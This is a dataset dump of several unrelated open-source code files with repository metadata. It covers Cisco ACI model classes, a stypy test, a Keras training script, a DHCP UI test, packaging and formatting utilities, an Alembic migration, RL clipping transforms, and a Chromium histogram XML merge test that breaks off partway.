01d2e4527f7d2563f3902393cf341ec5f00e4969 | f4b60f5e49baf60976987946c20a8ebca4880602 | /lib64/python2.7/site-packages/acimodel-1.3_2j-py2.7.egg/cobra/modelimpl/nws/rtoverridefwpol.py | 307c8d55e48a35eeb21395c77fc39efe8dff02b8 | [] | no_license | cqbomb/qytang_aci | 12e508d54d9f774b537c33563762e694783d6ba8 | a7fab9d6cda7fadcc995672e55c0ef7e7187696e | refs/heads/master | 2022-12-21T13:30:05.240231 | 2018-12-04T01:46:53 | 2018-12-04T01:46:53 | 159,911,666 | 0 | 0 | null | 2022-12-07T23:53:02 | 2018-12-01T05:17:50 | Python | UTF-8 | Python | false | false | 4,958 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2016 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class RtOverrideFwPol(Mo):
    """Auto-generated relation MO (nwsRtOverrideFwPol).

    Local side of the relation from nws:FwPol to infra:AttPolicyGroup.
    The object is system-created, read-only and non-configurable; its
    naming property is the target DN (``tDn``) of the policy group.
    """

    # Class-level relation metadata: target class, RN format, access masks,
    # containment and inheritance hierarchy. All generated — do not hand-edit.
    meta = TargetRelationMeta("cobra.model.nws.RtOverrideFwPol", "cobra.model.infra.AttPolicyGroup")

    meta.moClassName = "nwsRtOverrideFwPol"
    meta.rnFormat = "rtinfraOverrideFwPol-[%(tDn)s]"
    meta.category = MoCategory.RELATIONSHIP_FROM_LOCAL
    meta.label = "Access Attachable Policy Group"
    meta.writeAccessMask = 0x2100000000001
    meta.readAccessMask = 0x2300000000011
    meta.isDomainable = False
    meta.isReadOnly = True
    meta.isConfigurable = False
    meta.isDeletable = False
    meta.isContextRoot = False

    meta.parentClasses.add("cobra.model.nws.FwPol")

    meta.superClasses.add("cobra.model.reln.From")
    meta.superClasses.add("cobra.model.reln.Inst")
    meta.superClasses.add("cobra.model.pol.NFromRef")

    meta.rnPrefixes = [
        ('rtinfraOverrideFwPol-', True),
    ]

    # Property metadata: one PropMeta per MO attribute, each registered on
    # meta.props. Numeric arguments are generated property ids/categories.
    prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("deleteAll", "deleteall", 16384)
    prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
    prop._addConstant("ignore", "ignore", 4096)
    meta.props.add("childAction", prop)

    prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
    prop.label = "None"
    prop.isDn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("dn", prop)

    prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "local"
    prop._addConstant("implicit", "implicit", 4)
    prop._addConstant("local", "local", 0)
    prop._addConstant("policy", "policy", 1)
    prop._addConstant("replica", "replica", 2)
    prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
    meta.props.add("lcOwn", prop)

    prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 0
    prop.defaultValueStr = "never"
    prop._addConstant("never", "never", 0)
    meta.props.add("modTs", prop)

    prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
    prop.label = "None"
    prop.isRn = True
    prop.isImplicit = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    meta.props.add("rn", prop)

    prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
    prop.label = "None"
    prop.isImplicit = True
    prop.isAdmin = True
    prop._addConstant("created", "created", 2)
    prop._addConstant("deleted", "deleted", 8)
    prop._addConstant("modified", "modified", 4)
    meta.props.add("status", prop)

    prop = PropMeta("str", "tCl", "tCl", 19097, PropCategory.REGULAR)
    prop.label = "Target-class"
    prop.isImplicit = True
    prop.isAdmin = True
    prop.defaultValue = 4453
    prop.defaultValueStr = "infraAttPolicyGroup"
    prop._addConstant("infraAttPolicyGroup", None, 4453)
    prop._addConstant("unspecified", "unspecified", 0)
    meta.props.add("tCl", prop)

    # tDn is the naming property (appears in the RN) and requires delimiters.
    prop = PropMeta("str", "tDn", "tDn", 19096, PropCategory.REGULAR)
    prop.label = "Target-dn"
    prop.isConfig = True
    prop.isAdmin = True
    prop.isCreateOnly = True
    prop.isNaming = True
    meta.props.add("tDn", prop)

    meta.namingProps.append(getattr(meta.props, "tDn"))
    getattr(meta.props, "tDn").needDelimiter = True

    # Deployment Meta
    meta.deploymentQuery = True
    meta.deploymentType = "Ancestor"
    meta.deploymentQueryPaths.append(DeploymentPathMeta("nwsFwPolToPortGroups", "Portgroups", "cobra.model.vmm.EpPD"))
    meta.deploymentQueryPaths.append(DeploymentPathMeta("nwsFwPolToVirtualMachines", "Virtual Machines", "cobra.model.comp.Vm"))

    def __init__(self, parentMoOrDn, tDn, markDirty=True, **creationProps):
        """Create the relation MO under *parentMoOrDn*, named by *tDn*."""
        namingVals = [tDn]
        Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"collinsctk@qytang.com"
] | collinsctk@qytang.com |
2e9f0ae01fbad3c4bae02bb7427a5b127c6d02ff | eb3683f9127befb9ef96d8eb801206cf7b84d6a7 | /stypy/sgmc/sgmc_cache/taxonomy/builtin_functions/str/error_str_return_type.py | cffaa9f073b7b8d8146ea300f49c0b12c05ebde2 | [] | no_license | ComputationalReflection/stypy | 61ec27333a12f76ac055d13f8969d3e0de172f88 | be66ae846c82ac40ba7b48f9880d6e3990681a5b | refs/heads/master | 2021-05-13T18:24:29.005894 | 2018-06-14T15:42:50 | 2018-06-14T15:42:50 | 116,855,812 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,866 | py |
# -*- coding: utf-8 -*-
"""
ORIGINAL PROGRAM SOURCE CODE:
1: # coding=utf-8
2: __doc__ = "str builtin is invoked and its return type is used to call an non existing method"
3:
4: if __name__ == '__main__':
5: # Call options
6: # () -> <type 'str'>
7: # (AnyType) -> <type 'str'>
8:
9:
10: # Call the builtin
11: ret = str(3)
12:
13: # Type error
14: ret.unexisting_method()
15:
"""
# Import the stypy library necessary elements
from stypy.type_inference_programs.type_inference_programs_imports import *
# Create the module type store
# NOTE: this whole file is auto-generated by stypy — each statement of the
# original program is mirrored here as an explicit type-inference operation.
module_type_store = Context(None, __file__)

# ################# Begin of the type inference program ##################

# Assigning a Str to a Name (line 2):
str_1 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 2, 10), 'str', 'str builtin is invoked and its return type is used to call an non existing method')
# Assigning a type to the variable '__doc__' (line 2)
module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 2, 0), '__doc__', str_1)

if (__name__ == '__main__'):

    # Assigning a Call to a Name (line 11):

    # Call to str(...): (line 11)
    # Processing the call arguments (line 11)
    int_3 = get_builtin_python_type_instance(stypy.reporting.localization.Localization(__file__, 11, 14), 'int')
    # Processing the call keyword arguments (line 11)
    kwargs_4 = {}
    # Getting the type of 'str' (line 11)
    str_2 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 11, 10), 'str', False)
    # Calling str(args, kwargs) (line 11)
    str_call_result_5 = invoke(stypy.reporting.localization.Localization(__file__, 11, 10), str_2, *[int_3], **kwargs_4)
    # Assigning a type to the variable 'ret' (line 11)
    module_type_store.set_type_of(stypy.reporting.localization.Localization(__file__, 11, 4), 'ret', str_call_result_5)

    # Call to unexisting_method(...): (line 14)
    # Processing the call keyword arguments (line 14)
    kwargs_8 = {}
    # Getting the type of 'ret' (line 14)
    ret_6 = module_type_store.get_type_of(stypy.reporting.localization.Localization(__file__, 14, 4), 'ret', False)
    # Obtaining the member 'unexisting_method' of a type (line 14)
    # (expected to produce the type error this test case exists to exercise)
    unexisting_method_7 = module_type_store.get_type_of_member(stypy.reporting.localization.Localization(__file__, 14, 4), ret_6, 'unexisting_method')
    # Calling unexisting_method(args, kwargs) (line 14)
    unexisting_method_call_result_9 = invoke(stypy.reporting.localization.Localization(__file__, 14, 4), unexisting_method_7, *[], **kwargs_8)


# ################# End of the type inference program ##################

# Collect the errors and warnings produced while inferring the types above.
module_errors = stypy.errors.type_error.StypyTypeError.get_error_msgs()
module_warnings = stypy.errors.type_warning.TypeWarning.get_warning_msgs()
| [
"redondojose@uniovi.es"
] | redondojose@uniovi.es |
d818f2b57247fda0d8236a1bd190811a8475a46a | 6f917fb1840ea950b21941995ea96c3ec17d0a18 | /Study/keras2/keras77_07_cifar10_InceptionV3.py | 06f20232131f71809ece548e20bab695e8a87d22 | [] | no_license | maiorem/Artificial-Intelligence | 504a1656921c6d206237f17cd053ae38e1b4705c | 367fbffb678bd1761105ae4f37f015f90120d3f0 | refs/heads/main | 2023-02-03T00:24:20.571707 | 2020-12-18T08:24:48 | 2020-12-18T08:24:48 | 311,254,233 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,068 | py | import numpy as np
from tensorflow.keras.applications import InceptionV3
from tensorflow.keras.layers import Dense, Flatten, Input, BatchNormalization, Dropout, Activation
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.datasets import cifar10
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau
# 1. Data: load CIFAR-10, keep the first 10 test images for a prediction demo.
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
x_predict=x_test[:10, :, :, :]
# Scale pixel values from [0, 255] to [0, 1].
x_train=x_train.astype('float32')/255.
x_test=x_test.astype('float32')/255.
x_predict=x_predict.astype('float32')/255.
y_train=to_categorical(y_train)
y_test=to_categorical(y_test)

# 2. Model: frozen ImageNet-pretrained InceptionV3 backbone + small dense head.
# NOTE(review): InceptionV3 requires inputs of at least 75x75, so constructing
# it with input_shape=(32, 32, 3) raises a ValueError — see the note at the
# bottom of this script.
inceptionv3=InceptionV3(weights='imagenet', include_top=False, input_shape=(32, 32, 3)) # 14,714,688
inceptionv3.trainable=False

model=Sequential()
model.add(inceptionv3)
model.add(Flatten())
model.add(Dense(256))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Dense(256))
model.add(Dense(10, activation='softmax'))

# 3. Compile & train, with early stopping, LR reduction on plateau and
# best-model checkpointing.
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
es=EarlyStopping(monitor='val_loss', patience=10, mode='auto')
reduce_lr=ReduceLROnPlateau(monitor='val_loss', patience=3, factor=0.5, verbose=1)
modelpath='./model/inceptionv3-{epoch:02d}-{val_loss:.4f}.hdf5'
cp=ModelCheckpoint(filepath=modelpath, monitor='val_loss', save_best_only=True, mode='auto')
model.fit(x_train, y_train, epochs=1000, batch_size=32, verbose=1, validation_split=0.2, callbacks=[es, cp, reduce_lr])

# 4. Evaluate & predict on the held-out test set.
loss, accuracy=model.evaluate(x_test, y_test, batch_size=32)
print('loss : ', loss)
print('accuracy : ', accuracy)

y_predict=model.predict(x_predict)
y_predict=np.argmax(y_predict, axis=1) # Decode one-hot encodings with numpy's argmax.
y_actually=np.argmax(y_test[:10, :], axis=1)
print('실제값 : ', y_actually)
print('예측값 : ', y_predict)
'''
ValueError: Input size must be at least 75x75; got `input_shape=(32, 32, 3)`
''' | [
"maiorem00@gmail.com"
] | maiorem00@gmail.com |
c9638982979fe9123e4137a7d6a755d188484b69 | e2e08d7c97398a42e6554f913ee27340226994d9 | /pyautoTest-master(ICF-7.5.0)/test_case/scg/scg_DCHP_Server/test_c139270.py | 09792a397e1f38790b7d1ba0d50c6c908e764c4c | [] | no_license | lizhuoya1111/Automated_testing_practice | 88e7be512e831d279324ad710946232377fb4c01 | b3a532d33ddeb8d01fff315bcd59b451befdef23 | refs/heads/master | 2022-12-04T08:19:29.806445 | 2020-08-14T03:51:20 | 2020-08-14T03:51:20 | 287,426,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,516 | py | import pytest
import time
import sys
from os.path import dirname, abspath
sys.path.insert(0, dirname(dirname(abspath(__file__))))
from page_obj.scg.scg_def_physical_interface import *
from page_obj.scg.scg_def_vlan_interface import *
from page_obj.scg.scg_def_bridge import *
from page_obj.common.rail import *
from page_obj.scg.scg_def_physical_interface import *
from page_obj.common.ssh import *
from page_obj.scg.scg_def_dhcp import *
from page_obj.scg.scg_dev import *
from page_obj.scg.scg_def_ifname_OEM import *
from page_obj.scg.scg_def import *
test_id = 139270
def test_c139270(browser):
    """TestRail case C139270: add, edit and delete a DHCP server on an
    interface via the web UI, verifying each step through the management log.

    Flow: configure an IP on the interface over SSH, add/edit/delete the DHCP
    server in the browser, read the management log after each step, then clean
    up the interface IP. The result is reported to TestRail (rail_pass/fail).
    """
    try:
        login_web(browser, url=dev1)

        # Give the test interface an address over SSH so DHCP can bind to it.
        a = Shell_SSH()
        a.connect(dev1)
        a.execute("en")
        a.execute("conf t")
        a.execute("interface gigabitethernet "+interface_name_3)
        a.execute("ip address 131.1.1.1 255.255.255.0")
        a.execute("exit")

        # Step 1: create the DHCP server and capture the log.
        dhcp_server_add(browser, interface=interface_name_3,
                        dhcp_type="dhcp_server", dhcp_gw="131.1.1.254", dhcp_sm="24",
                        dns_server1="114.114.114.114", wins_server1="115.115.115.115",
                        ip_range1_1="131.1.1.5", ip_range1_2="131.1.1.20")
        time.sleep(1)
        loginfo1 = get_log_info(browser, 管理日志)
        # print(loginfo1)

        # Step 2: edit the address pool and capture the log.
        dhcp_server_edit_or_delete(browser, fuction="edit", dhcp_type="server",
                                   ip_range1_1="131.1.1.6", ip_range1_2="131.1.1.15")
        time.sleep(1)
        loginfo2 = get_log_info(browser, 管理日志)
        browser.switch_to.default_content()
        # print(loginfo2)
        time.sleep(1)

        # Step 3: delete the DHCP server and capture the log.
        dhcp_server_edit_or_delete(browser, fuction="delete")
        loginfo3 = get_log_info(browser, 管理日志)
        # print(loginfo3)
        time.sleep(1)

        # Clean up: remove the interface address configured above.
        a = Shell_SSH()
        a.connect(dev1)
        a.execute("en")
        a.execute("conf t")
        a.execute("interface gigabitethernet "+interface_name_3)
        a.execute("no ip address 131.1.1.1")
        a.execute("exit")

        # Report the verdict to TestRail, then re-assert so pytest fails too.
        try:
            assert "启动DHCP成功" in loginfo1
            assert "设置DHCP成功" in loginfo2
            assert "删除DHCP成功" in loginfo3
            rail_pass(test_run_id, test_id)
        except:
            rail_fail(test_run_id, test_id)
            assert "启动DHCP成功" in loginfo1
            assert "设置DHCP成功" in loginfo2
            assert "删除DHCP成功" in loginfo3
    except Exception as err:
        # If any step above failed, reboot the device to restore configuration.
        print(err)
        rail_fail(test_run_id, test_id)
        reload(hostip=dev1)
        assert False
if __name__ == '__main__':
    # Allow running this single case directly: pytest with verbose output.
    pytest.main(["-v", "-s", "test_c" + str(test_id) + ".py"])
| [
"15501866985@163.com"
] | 15501866985@163.com |
9d6bbb76470fb5d0e262f7b536a47205de61ce1e | e1abd868bfad11bf93c50eee1dc9976674de2358 | /setup.py | af6a5de4baca477cae84d74eba1926d6aac1f4f6 | [] | no_license | markmuetz/scaffold_analysis | 5c7e9d04b24abe3462c8946381f4cab264bf09e0 | c02d32536c801b23ac8a71e36d25fa922e7cfd94 | refs/heads/master | 2022-06-03T16:13:54.775718 | 2022-05-31T13:22:24 | 2022-05-31T13:22:24 | 92,677,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,463 | py | #!/usr/bin/env python
import os
try:
from setuptools import setup, Extension
except ImportError:
from distutils.core import setup, Extension
from scaffold.version import get_version
def read(fname):
    """Return the contents of *fname*, resolved relative to this file.

    Used to load the long description for setup(); returns '' when the file
    is missing or unreadable so packaging still works without it.
    """
    path = os.path.join(os.path.dirname(__file__), fname)
    try:
        # Context manager closes the handle (the original leaked it), and
        # only I/O errors are swallowed — not KeyboardInterrupt/SystemExit
        # as the previous bare `except:` did.
        with open(path) as f:
            return f.read()
    except OSError:
        return ''
# Package metadata for scaffold; long_description falls back to '' when
# readme.rst is absent (see read() above).
setup(
    name='scaffold',
    version=get_version(),
    description='High-resolution analysis',
    long_description=read('readme.rst'),
    author='Mark Muetzelfeldt',
    author_email='m.muetzelfeldt@pgr.reading.ac.uk',
    maintainer='Mark Muetzelfeldt',
    maintainer_email='m.muetzelfeldt@pgr.reading.ac.uk',
    packages=[
        'scaffold',
        'scaffold.cycle',
        'scaffold.expt',
        'scaffold.suite',
        'scaffold.tests'
    ],
    scripts=[ ],
    python_requires='>=3.6',
    install_requires=[
        'omnium>=0.10.2',
        'cloud_tracking',
        'f90nml',
        # 'iris',
        'matplotlib',
        'numpy',
        'scipy',
    ],
    package_data={ },
    url='https://github.com/markmuetz/scaffold_analysis',
    classifiers=[
        'Environment :: Console',
        'Intended Audience :: Science/Research',
        'Natural Language :: English',
        'Operating System :: POSIX :: Linux',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: C',
        'Topic :: Scientific/Engineering :: Atmospheric Science',
    ],
    keywords=[''],
)
| [
"markmuetz@gmail.com"
] | markmuetz@gmail.com |
c631ce14fa9545f28ff4141ddc75270876ae683c | da459298c4bdbb745f4ed80ce1c9da15dd8fbb34 | /demisto_sdk/commands/format/update_genericmodule.py | 6dae063b2baf56525d321cab77a0cde0727d3fff | [
"MIT"
] | permissive | demisto/demisto-sdk | af998a87523d03097f725ed8f31f6a44f4605ef2 | 3169757a2f98c8457e46572bf656ec6b69cc3a2e | refs/heads/master | 2023-08-22T03:44:31.654275 | 2023-08-21T14:45:22 | 2023-08-21T14:45:22 | 219,291,269 | 63 | 75 | MIT | 2023-09-14T14:41:12 | 2019-11-03T11:36:13 | Python | UTF-8 | Python | false | false | 2,162 | py | from typing import Tuple
from demisto_sdk.commands.common.constants import (
FILETYPE_TO_DEFAULT_FROMVERSION,
FileType,
)
from demisto_sdk.commands.common.logger import logger
from demisto_sdk.commands.format.format_constants import (
ERROR_RETURN_CODE,
SKIP_RETURN_CODE,
SUCCESS_RETURN_CODE,
)
from demisto_sdk.commands.format.update_generic_json import BaseUpdateJSON
class GenericModuleJSONFormat(BaseUpdateJSON):
    """Formatter that normalizes a generic module JSON file to Demisto conventions.

    Attributes:
        input (str): path of the file currently being formatted.
        output (str): destination file name for the formatted JSON.
    """

    def __init__(
        self,
        input: str = "",
        output: str = "",
        path: str = "",
        from_version: str = "",
        no_validate: bool = False,
        **kwargs,
    ):
        super().__init__(
            input=input,
            output=output,
            path=path,
            from_version=from_version,
            no_validate=no_validate,
            **kwargs,
        )

    def run_format(self) -> int:
        """Apply the standard JSON formatting steps and write the result.

        Returns SUCCESS_RETURN_CODE on success, ERROR_RETURN_CODE on any failure.
        """
        try:
            logger.info(
                f"\n[blue]================= Updating file {self.source_file} =================[/blue]"
            )
            # Generic modules fall back to their file-type's default fromversion.
            default_version = FILETYPE_TO_DEFAULT_FROMVERSION.get(
                FileType.GENERIC_MODULE
            )
            super().update_json(default_from_version=default_version)
            self.set_default_values_as_needed()
            self.save_json_to_destination_file()
        except Exception as err:
            logger.debug(
                f"\n[red]Failed to update file {self.source_file}. Error: {err}[/red]"
            )
            return ERROR_RETURN_CODE
        return SUCCESS_RETURN_CODE

    def format_file(self) -> Tuple[int, int]:
        """Format the file and, when formatting succeeds, run validation.

        Returns a (format_result, validation_result) tuple; validation is
        skipped when formatting failed.
        """
        status = self.run_format()
        if status:
            return status, SKIP_RETURN_CODE
        return status, self.initiate_file_validator()
| [
"noreply@github.com"
] | demisto.noreply@github.com |
70b47bc20fa0747f8ebdcddca39cee6d773a59b7 | b9b967c8154ffb3c3622c4b46065132a33e785f6 | /server/migrations/versions/25bdca95116e_backfill_usernames_history.py | 9d47ccf0e197217c90187c58165fcf84ba31396d | [
"Apache-2.0"
] | permissive | SURFscz/SBS | 5917561656caec042e5a6c966aeb54b82e96f51d | b159eeb7a5b8246aebd9849b4b3b61b9af1a8514 | refs/heads/main | 2023-08-31T12:42:52.473898 | 2023-08-31T11:58:51 | 2023-08-31T11:58:51 | 162,148,147 | 4 | 1 | Apache-2.0 | 2023-09-12T12:07:41 | 2018-12-17T15:05:54 | JavaScript | UTF-8 | Python | false | false | 736 | py | """Backfill usernames history
Revision ID: 25bdca95116e
Revises: 3cda08121a2f
Create Date: 2021-04-07 08:04:36.467191
"""
from alembic import op
from sqlalchemy import text
# revision identifiers, used by Alembic.
revision = '25bdca95116e'        # this migration
down_revision = '3cda08121a2f'   # parent migration in the chain
branch_labels = None
depends_on = None
def upgrade():
    """Backfill user_names_history with every existing username.

    Adds a unique index on user_names_history.username, then copies each
    non-NULL username from the users table into the history table.
    """
    conn = op.get_bind()
    # Enforce uniqueness first so the backfill cannot insert duplicates.
    conn.execute(text("ALTER TABLE user_names_history ADD UNIQUE INDEX user_names_history_username(username)"))
    result = conn.execute(text("SELECT username FROM `users` WHERE `username` IS NOT NULL"))
    for row in result:
        # Use a bound parameter instead of f-string interpolation: a username
        # containing a quote would otherwise break the statement (and is an
        # SQL-injection vector).
        conn.execute(
            text("INSERT INTO `user_names_history` (`username`) VALUES (:username)"),
            {"username": row[0]},
        )
def downgrade():
    # Intentionally a no-op: the backfilled history rows and the unique index
    # are left in place when rolling this migration back.
    pass
| [
"oharsta@zilverline.com"
] | oharsta@zilverline.com |
528a8ce895effa2425984fb1b4778eb503f97668 | 66c7b0da6ee27ddce0943945503cdecf199f77a2 | /rllib/dataset/transforms/clipper.py | ae5dc975babb030a2182a4fe53278f08e935ae14 | [
"MIT"
] | permissive | tzahishimkin/extended-hucrl | 07609f9e9f9436121bcc64ff3190c966183a2cd9 | c144aeecba5f35ccfb4ec943d29d7092c0fa20e3 | refs/heads/master | 2023-07-09T22:57:28.682494 | 2021-08-24T08:50:16 | 2021-08-24T08:50:16 | 383,819,908 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,708 | py | """Implementation of a Transformation that clips attributes."""
import numpy as np
import torch
import torch.jit
import torch.nn as nn
from .abstract_transform import AbstractTransform
class Clipper(nn.Module):
    """Clamp values element-wise into a fixed [min_val, max_val] interval.

    Works on both ``torch.Tensor`` and numpy inputs; ``inverse`` is the
    identity because clipping cannot be undone.
    """

    def __init__(self, min_val, max_val):
        super().__init__()
        self._min = min_val
        self._max = max_val

    def forward(self, array):
        """Return ``array`` clamped to the configured range."""
        if isinstance(array, torch.Tensor):
            return array.clamp(self._min, self._max)
        return np.clip(array, self._min, self._max)

    @torch.jit.export
    def inverse(self, array):
        """Identity: clipping has no inverse."""
        return array
class RewardClipper(AbstractTransform):
    """Transformation that clips an observation's reward in place.

    Parameters
    ----------
    min_reward: float, optional (default=0.)
        Lower bound applied to rewards.
    max_reward: float, optional (default=1.)
        Upper bound applied to rewards.

    Notes
    -----
    Clipping is not invertible, so ``inverse`` leaves the reward untouched
    and returns the observation as-is.
    """

    def __init__(self, min_reward=0.0, max_reward=1.0):
        super().__init__()
        self._clipper = Clipper(min_reward, max_reward)

    def forward(self, observation):
        """Clip the observation's reward and return the observation."""
        clipped_reward = self._clipper(observation.reward)
        observation.reward = clipped_reward
        return observation

    @torch.jit.export
    def inverse(self, observation):
        """Return the observation unchanged (clipping has no inverse)."""
        untouched_reward = self._clipper.inverse(observation.reward)
        observation.reward = untouched_reward
        return observation
class ActionClipper(AbstractTransform):
    """Transformation that clips an observation's action in place.

    Parameters
    ----------
    min_action: float, optional (default=-1.)
        Lower bound applied to actions.
    max_action: float, optional (default=1.)
        Upper bound applied to actions.

    Notes
    -----
    Clipping is not invertible, so ``inverse`` leaves the action untouched
    and returns the observation as-is.
    """

    def __init__(self, min_action=-1.0, max_action=1.0):
        super().__init__()
        self._clipper = Clipper(min_action, max_action)

    def forward(self, observation):
        """Clip the observation's action and return the observation."""
        clipped_action = self._clipper(observation.action)
        observation.action = clipped_action
        return observation

    @torch.jit.export
    def inverse(self, observation):
        """Return the observation unchanged (clipping has no inverse)."""
        untouched_action = self._clipper.inverse(observation.action)
        observation.action = untouched_action
        return observation
| [
"shi.tzahi@gmail.com"
] | shi.tzahi@gmail.com |
25ba0535997991ef82b8d6d879ed5f81d8b47140 | 88ae8695987ada722184307301e221e1ba3cc2fa | /tools/metrics/histograms/merge_xml_test.py | 3dab9df3b524089bca4f33a13110782a250d6cbe | [
"BSD-3-Clause"
] | permissive | iridium-browser/iridium-browser | 71d9c5ff76e014e6900b825f67389ab0ccd01329 | 5ee297f53dc7f8e70183031cff62f37b0f19d25f | refs/heads/master | 2023-08-03T16:44:16.844552 | 2023-07-20T15:17:00 | 2023-07-23T16:09:30 | 220,016,632 | 341 | 40 | BSD-3-Clause | 2021-08-13T13:54:45 | 2019-11-06T14:32:31 | null | UTF-8 | Python | false | false | 7,500 | py | # Copyright 2020 The Chromium Authors
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
import xml.dom.minidom
import expand_owners
import histogram_paths
import merge_xml
class MergeXmlTest(unittest.TestCase):
  """Tests for merge_xml: merging enums, histograms, suffixes and ukm XML."""

  def testMergeFiles(self):
    """Checks that enums.xml and histograms.xml can merge successfully."""
    merged = merge_xml.PrettyPrintMergedFiles([
        histogram_paths.TEST_ENUMS_XML, histogram_paths.TEST_HISTOGRAMS_XML,
        histogram_paths.TEST_SUFFIXES_XML
    ])
    # If ukm.xml is not provided, there is no need to populate the
    # UkmEventNameHash enum.
    expected_merged_xml = """
<histogram-configuration>
<enums>
<enum name="Enum1">
<int value="0" label="Value0"/>
<int value="1" label="Value1"/>
</enum>
<enum name="TestEnum">
<int value="0" label="Value0"/>
<int value="1" label="Value1"/>
</enum>
<enum name="UkmEventNameHash">
<summary>
Placeholder enum. The values are UKM event name hashes truncated to 31 bits.
This gets populated by the GetEnumsNodes function in merge_xml.py when
producing the merged XML file.
</summary>
</enum>
</enums>
<histograms>
<variants name="TestToken">
<variant name="Variant1" summary="Label1"/>
<variant name="Variant2" summary="Label2"/>
</variants>
<histogram name="Foo.Bar" units="xxxxxxxxxxxxxxxxxxyyyyyyyyyyyyyyyyyyyyyyzzzz"
expires_after="M85">
<owner>person@chromium.org</owner>
<component>Component</component>
<summary>Foo</summary>
</histogram>
<histogram name="Test.EnumHistogram" enum="TestEnum" expires_after="M81">
<obsolete>
Obsolete message
</obsolete>
<owner>uma@chromium.org</owner>
<summary>A enum histogram.</summary>
</histogram>
<histogram name="Test.Histogram" units="microseconds" expires_after="M85">
<obsolete>
Removed 6/2020.
</obsolete>
<owner>person@chromium.org</owner>
<summary>Summary 2</summary>
</histogram>
<histogram name="Test.TokenHistogram{TestToken}" units="microseconds"
expires_after="M85">
<obsolete>
Removed 6/2020.
</obsolete>
<owner>person@chromium.org</owner>
<summary>Summary 2</summary>
<token key="TestToken" variants="TestToken"/>
</histogram>
</histograms>
<histogram_suffixes_list>
<histogram_suffixes name="Test.EnumHistogramSuffixes" separator="."
ordering="prefix,2">
<suffix name="TestEnumSuffix" label="The enum histogram_suffixes"/>
<affected-histogram name="Test.EnumHistogram"/>
</histogram_suffixes>
<histogram_suffixes name="Test.HistogramSuffixes" separator=".">
<suffix name="TestSuffix" label="A histogram_suffixes"/>
<affected-histogram name="Test.Histogram"/>
</histogram_suffixes>
</histogram_suffixes_list>
</histogram-configuration>
"""
    self.maxDiff = None
    self.assertMultiLineEqual(expected_merged_xml.strip(), merged.strip())

  def testMergeFiles_WithXmlEvents(self):
    """Checks that the UkmEventNameHash enum is populated correctly.

    If ukm.xml is provided, populate a list of ints to the UkmEventNameHash enum
    where each value is a truncated hash of the event name and each label is the
    corresponding event name, with obsolete label when applicable.
    """
    merged = merge_xml.PrettyPrintMergedFiles(histogram_paths.ALL_TEST_XMLS)
    expected_merged_xml = """
<histogram-configuration>
<enums>
<enum name="Enum1">
<int value="0" label="Value0"/>
<int value="1" label="Value1"/>
</enum>
<enum name="TestEnum">
<int value="0" label="Value0"/>
<int value="1" label="Value1"/>
</enum>
<enum name="UkmEventNameHash">
<summary>
Placeholder enum. The values are UKM event name hashes truncated to 31 bits.
This gets populated by the GetEnumsNodes function in merge_xml.py when
producing the merged XML file.
</summary>
<int value="151676257" label="AbusiveExperienceHeuristic.TestEvent1"/>
<int value="898353372"
label="AbusiveExperienceHeuristic.TestEvent2 (Obsolete)"/>
<int value="1052089961" label="Autofill.TestEvent3"/>
<int value="1758741469" label="FullyObsolete.TestEvent4 (Obsolete)"/>
</enum>
</enums>
<histograms>
<variants name="TestToken">
<variant name="Variant1" summary="Label1"/>
<variant name="Variant2" summary="Label2"/>
</variants>
<histogram name="Foo.Bar" units="xxxxxxxxxxxxxxxxxxyyyyyyyyyyyyyyyyyyyyyyzzzz"
expires_after="M85">
<owner>person@chromium.org</owner>
<component>Component</component>
<summary>Foo</summary>
</histogram>
<histogram name="Test.EnumHistogram" enum="TestEnum" expires_after="M81">
<obsolete>
Obsolete message
</obsolete>
<owner>uma@chromium.org</owner>
<summary>A enum histogram.</summary>
</histogram>
<histogram name="Test.Histogram" units="microseconds" expires_after="M85">
<obsolete>
Removed 6/2020.
</obsolete>
<owner>person@chromium.org</owner>
<summary>Summary 2</summary>
</histogram>
<histogram name="Test.TokenHistogram{TestToken}" units="microseconds"
